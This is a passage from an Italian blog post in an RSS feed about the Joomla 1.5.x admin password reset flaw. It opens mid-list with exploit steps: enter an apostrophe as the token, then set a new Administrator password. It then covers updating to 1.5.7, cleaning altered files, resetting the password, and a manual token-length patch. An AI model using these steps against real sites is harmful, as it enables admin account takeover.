<p>3) Inserite l&#8217;apice (&#8216;) come carattere continuate</p>
<p>4) A questo punto avrete il campo di cambio password e, inserendola, editerete direttamente il profilo Administrator <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_wink.gif' alt="[EXPLOIT] Joomla 1.5.x Remote Admin Password Change" class='wp-smiley' title="[EXPLOIT] Joomla 1.5.x Remote Admin Password Change pics" /> </p>
<p>Il supporto Joomla individuata la vulnerabilità (la variabile token non veniva correttamente verificata) ha provveduto a rilasciare in tempi da record la versione 1.5.6 con tale problema fixato. Dalla sua uscita sono stati scoperti ulteriori vulnerabilità che han portato alla release 1.5.7 in pochi giorni:</p>
<p>Potete scaricare dai seguenti link questa versione:</p>
<p><a href="http://joomlacode.org/gf/download/frsrelease/8376/30993/Joomla_1.5.7-Stable-Full_Package.zip" target="_blank">Joomla 1.5.7 Full Eng</a></p>
<p><a href="http://download.joomla.it/index.php?option=com_docman&amp;task=doc_download&amp;gid=717&amp;&amp;Itemid=2" target="_blank">Joomla 1.5.7 Full Ita</a></p>
<p>Per chi avesse subito un&#8217;hacking sfruttando questa vulnerabilità consiglio di aggiornare a questa versione e, nel caso siano ancora visibili &#8220;tracce&#8221; (home page cambiate) dell&#8217;hacker ho notato, per esperienza, che le pagine maggiormente colpite sono 3:</p>
<ul>
<li>configuration.php</li>
<li>index.php (del template attivo nel Cms)</li>
<li>la cartella &#8220;cache&#8221; (consiglio di svuotarla)</li>
</ul>
<p>Provvedete a ripristinare le originali e il problema è risolto.</p>
<p>Dato che trovere il vostro account Admin non accessibile visto che è stata cambiata la password sarà necessario effettuare l&#8217;accesso direttamente al PhpMyAdmin e riscrivere la password nel Database.</p>
<p>Una guida a questa operazione la potete trovare <a href="http://wiki.joomla.it/index.php?title=Recupero_password_admin" target="_blank">qui</a>.</p>
<p>Per chi non avesse sbattimento ho fatto uno scriptino veloce veloce che fa la stessa cosa. Basta copiare il file nella root della vostra installazione Joomla, richiamarlo da Browser e impostare la password.</p>
<p>Il file lo potete scaricare dal seguente link:</p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2008/09/change_pwd.rar">Joomla Change Admin Password</a></p>
<p>Infine, x chi ha molto sbattimento, di seguito la guida a come fixare tale vulnerabilità manualmente.</p>
<ol>
<li>Aprire il file &#8220;/components/com_user/models/reset.php&#8221;</li>
<li>Posizionarsi alla riga 113 dopo la riga &#8220;global $mainframe;&#8221; ed inserire il seguente codice<br />
<blockquote><p><strong>if(strlen($token) != 32) {<br />
 $this-&gt;setError(JText::_(&#8216;INVALID_TOKEN&#8217;));<br />
 return false;<br />
 }</strong></p>
</blockquote>
</li>
<li>
<pre>Fine dei giochi! <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_biggrin.gif' alt="[EXPLOIT] Joomla 1.5.x Remote Admin Password Change" class='wp-smiley' title="[EXPLOIT] Joomla 1.5.x Remote Admin Password Change pics" /> </pre>
</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/joomla-15x-remote-admin-password-change.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

<!-- Served from: www.capn3m0.org @ 2012-02-09 07:26:10 by W3 Total Cache -->
